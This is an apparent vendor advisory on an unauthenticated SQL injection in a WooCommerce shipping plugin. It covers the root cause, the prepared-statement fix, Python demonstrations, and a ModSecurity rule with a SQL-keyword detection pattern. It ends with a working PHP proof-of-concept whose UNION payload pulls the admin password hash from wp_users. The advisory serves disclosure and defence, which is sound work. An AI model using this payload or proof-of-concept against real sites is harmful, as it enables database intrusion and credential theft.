Atomic Edge analysis of CVE-2026-54815:
This vulnerability is an unauthenticated SQL injection in the Cargo Shipping Location for WooCommerce plugin. It affects versions up to and including 5.6. The flaw allows attackers with no authentication to extract sensitive information from the database. The CVSS score is 7.5 (HIGH).
The root cause lies in the `cargo_update_shipment_status_callback` method within `/wp-content/plugins/cargo-shipping-location-for-woocommerce/includes/CargoApi/Webhook.php`. In the vulnerable version (5.6), the code at lines 82-86 directly interpolated the `$data['shipment_id']` parameter into a SQL query without using parameterized queries or proper escaping. The affected code path is the webhook callback function, which processes shipment status updates from the Cargo API. The `$data['shipment_id']` value comes from an HTTP request parameter parsed by the webhook endpoint.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the WordPress REST API endpoint that triggers the cargo shipment status update webhook. The attacker does not need authentication. The specific payload would be sent in the request body as the `shipment_id` parameter. A malicious value like `' OR 1=1#` would break out of the SQL string context and inject arbitrary SQL commands. The vulnerable query is: `SELECT * FROM {$wpdb->prefix}{$tableName} WHERE meta_key = 'cslfw_shipping' AND meta_value LIKE '%{$data['shipment_id']}%'`.
The patch in version 5.7 replaces the direct string interpolation with a prepared statement. The diff shows the vulnerable code was changed from the raw string concatenation to using `$wpdb->prepare()` with `%s` placeholders. The `$wpdb->prepare()` function properly escapes the input, preventing SQL injection. Additionally, the patch adds an origin domain validation check in the `cargo_update_shipment_status_permission` method, which restricts which domains can trigger the webhook, providing an additional layer of security.
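As an added worked example (not code from the advisory or from the plugin), the same query shape in Python against an in-memory SQLite table standing in for `wp_postmeta`: `build_vulnerable_query()` shows where the pre-5.7 code let the `shipment_id` text land inside the SQL literal, and `find_shipments()` is the bound-parameter equivalent of the `$wpdb->prepare()` fix. The `esc_like()` helper mirrors WordPress's `$wpdb->esc_like()`: binding the value stops injection, but `%` and `_` inside a bound value still act as LIKE wildcards unless they are escaped, which is a separate thing to check on the patched code. The function names, the table contents and the sample rows are constructed for this example.

```python
import sqlite3

# Constructed sample rows standing in for wp_postmeta (meta_id, post_id, meta_key, meta_value).
SAMPLE_ROWS = [
    (1, 101, "cslfw_shipping", "CS-1001"),
    (2, 102, "cslfw_shipping", "CS-1002"),
    (3, 103, "cslfw_shipping", "CS-1003"),
    (4, 104, "_other_meta", "CS-1001"),  # same value, different key: must not match
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_postmeta (meta_id INTEGER, post_id INTEGER, meta_key TEXT, meta_value TEXT)"
    )
    conn.executemany("INSERT INTO wp_postmeta VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_query(shipment_id: str) -> str:
    """Pre-5.7 shape: the request value is spliced straight into the SQL text.

    Returned only as a string for inspection; it is never executed here."""
    return (
        "SELECT * FROM wp_postmeta WHERE meta_key = 'cslfw_shipping' "
        f"AND meta_value LIKE '%{shipment_id}%'"
    )


def esc_like(text: str) -> str:
    """Equivalent of $wpdb->esc_like(): make LIKE wildcards match literally.

    Backslash is the ESCAPE character used by find_shipments(), so it is doubled first."""
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def find_shipments(conn: sqlite3.Connection, shipment_id: str, escape_wildcards: bool = True) -> list:
    """Post-fix shape: the value is bound as a parameter, so a quote cannot close the literal.

    escape_wildcards=False shows what binding alone leaves open: a bare '%' still matches every row."""
    needle = esc_like(shipment_id) if escape_wildcards else shipment_id
    cur = conn.execute(
        "SELECT post_id FROM wp_postmeta WHERE meta_key = 'cslfw_shipping' "
        "AND meta_value LIKE ? ESCAPE '\\'",
        ("%" + needle + "%",),
    )
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("' OR 1=1#"))              # the quote sits unescaped inside the literal
    print(find_shipments(db, "CS-1001"))                     # [101]
    print(find_shipments(db, "' OR 1=1#"))                   # [] : bound value is plain text
    print(find_shipments(db, "%"))                           # [] : wildcard escaped
    print(find_shipments(db, "%", escape_wildcards=False))   # [101, 102, 103]
```

The bound-parameter version is what `%s` in `$wpdb->prepare()` gives you; the `ESCAPE` clause is the SQLite spelling of what MySQL does with its default backslash escape, which is why `$wpdb->esc_like()` only needs to double the backslash and prefix `%` and `_`.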
If exploited, an attacker can extract any data from the WordPress database. This includes user credentials (hashed passwords, usernames, emails), customer order details, API keys, and other sensitive configuration data. The attacker can use UNION-based SQL injection or time-based blind injection techniques to enumerate the database. The impact is severe because it compromises the confidentiality of the entire site database without requiring any prior authentication.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

```apache
SecRule REQUEST_URI "@streq /wp-json/cslfw/v1/shipment/update_status" "id:20265481,phase:2,deny,status:403,chain,msg:'CVE-2026-54815 via Cargo API REST endpoint',severity:'CRITICAL',tag:'CVE-2026-54815'"
SecRule ARGS_POST:shipment_id "@rx [\'\-]|union|select|into|load_file|outfile|sleep|benchmark|substr" "chain"
SecRule REQUEST_METHOD "@streq POST" ""
```
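To see what the chained rule will and will not deny before enforcing it, here is an added Python model of its three conditions (exact endpoint, POST method, and the `shipment_id` pattern) run over constructed sample requests; it is not ModSecurity and not part of the advisory. Two tuning points fall out of it: the character class fires on any hyphen, so a legitimate shipment id such as `ABC-123` is denied too and the rule should be checked against the real id format; and the keyword branch is case-sensitive, as `@rx` is unless the chained rule carries a `t:lowercase` transformation, which the `lowercase` flag models. The function names and sample requests are assumptions for this example.

```python
import re

# Endpoint from rule 1 of the chain.
ENDPOINT = "/wp-json/cslfw/v1/shipment/update_status"
# Same alternation as rule 2's @rx: a single quote or a hyphen, or one of the SQL keywords.
# Python's re is case-sensitive here, exactly as PCRE is without t:lowercase.
SHIPMENT_ID_PATTERN = re.compile(r"['\-]|union|select|into|load_file|outfile|sleep|benchmark|substr")


def should_block(method: str, uri: str, post_args: dict, lowercase: bool = False) -> bool:
    """Return True when the chained rule would deny the request.

    lowercase=True models adding t:lowercase to the ARGS_POST rule (not present as written)."""
    if uri != ENDPOINT or method != "POST":   # rules 1 and 3 of the chain
        return False
    value = post_args.get("shipment_id")      # rule 2 only looks at this POST argument
    if value is None:
        return False
    if lowercase:
        value = value.lower()
    return SHIPMENT_ID_PATTERN.search(value) is not None


# Constructed sample requests as (method, uri, POST args); not captured traffic.
SAMPLE_REQUESTS = [
    ("POST", ENDPOINT, {"shipment_id": "' OR 1=1#"}),                 # payload named in the advisory
    ("POST", ENDPOINT, {"shipment_id": "12345"}),                     # benign numeric id
    ("POST", ENDPOINT, {"shipment_id": "ABC-123"}),                   # benign id with a hyphen
    ("GET", ENDPOINT, {"shipment_id": "' OR 1=1#"}),                  # wrong method: rule 3 fails
    ("POST", "/wp-json/wp/v2/posts", {"shipment_id": "' OR 1=1#"}),  # other endpoint: rule 1 fails
    ("POST", ENDPOINT, {"shipment_id": "1 UNION SELECT 1"}),          # upper-case keyword, no quote
]


def evaluate_samples(lowercase: bool = False) -> list:
    """Run every sample through should_block and return the verdicts in order."""
    return [should_block(method, uri, args, lowercase) for method, uri, args in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (method, uri, args), verdict in zip(SAMPLE_REQUESTS, evaluate_samples()):
        print("DENY" if verdict else "PASS", method, uri, repr(args["shipment_id"]))
```

Running it shows the third sample denied on the hyphen alone and the last one passed because `UNION` does not match the lowercase keyword; `evaluate_samples(lowercase=True)` flips only that last verdict.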
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54815 - Cargo Shipping Location for WooCommerce <= 5.6 - Unauthenticated SQL Injection

// Configuration - Change these values
$target_url = 'http://example.com'; // WordPress site URL

// REST API endpoint that triggers the vulnerable webhook callback
$endpoint = $target_url . '/wp-json/cslfw/v1/shipment/update_status';

// Step 1: Craft a malicious payload for SQL injection
// The vulnerable query is:
// SELECT * FROM {$wpdb->prefix}postmeta WHERE meta_key = 'cslfw_shipping' AND meta_value LIKE '%{$data['shipment_id']}%'
// We will inject a UNION-based payload to extract WordPress user credentials
$payload = "' UNION SELECT user_login, user_pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM wp_users WHERE user_login='admin' -- ";

// Step 2: Build the request body
$body = array(
    'shipment_id' => $payload
);

// Step 3: Initialize cURL and send the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($body));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'X-Cargo-Domain: api-v2.cargo.co.il' // Note: In the patched version this header is required; in vulnerable version it may not be enforced
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Step 4: Check for success or error
if ($http_code == 200 && !empty($response)) {
    echo "[+] Vulnerability confirmed! Response:\n";
    echo $response . "\n";
    echo "[+] Note: The above output may contain the admin password hash if the UNION injection succeeded.\n";
} elseif ($http_code == 403) {
    echo "[-] Access denied (403). The site may be patched or has a WAF blocking the request.\n";
} else {
    echo "[-] Received HTTP code $http_code. Response: $response\n";
    echo "[+] If the site is unpatched, try with different payload or adjust the endpoint.\n";
}
curl_close($ch);
?>
```